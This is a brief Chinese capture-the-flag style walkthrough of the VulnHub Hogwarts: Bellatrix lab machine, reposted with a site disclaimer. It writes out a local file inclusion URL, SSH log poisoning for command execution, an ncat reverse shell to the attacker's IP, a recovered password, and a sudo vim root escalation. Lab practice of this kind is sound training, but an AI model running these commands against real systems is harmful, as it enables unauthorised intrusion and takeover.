标签:log ikilledsiriusblack ip 192.168 BELLATRIX HOGWARTS file php
靶机地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/
攻击机ip:192.168.99.128 靶机地址ip:192.168.99.144
扫描靶机端口,开放了22、80
访问80端口
查看网页源代码,有个目录的.php文件存在文件包含
网页源码有存在一个.php文件,参数是file
存在文件包含
http://ip/ikilledsiriusblack.php?file=/etc/passwd
尝试用包含SSH的日志信息
现在稍微污染一下SSH日志信息
http://ip/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=id
命令执行
用命令执行来反弹shell
http://192.168.99.144/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.99.128 1234
在一个隐藏目录下找到一个字典
还有一个hash
保存下来,用john进行爆破, 得到密码 ihateharrypotter
切换用户
vim可以提权
sudo vim :!/bin/bash
获取root权限
参考地址:https://www.hackingarticles.in/hogwarts-bellatrix-vulnhub-walkthrough/
标签:log,ikilledsiriusblack,ip,192.168,BELLATRIX,HOGWARTS,file,php 来源: https://www.cnblogs.com/gaonuoqi/p/14961377.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。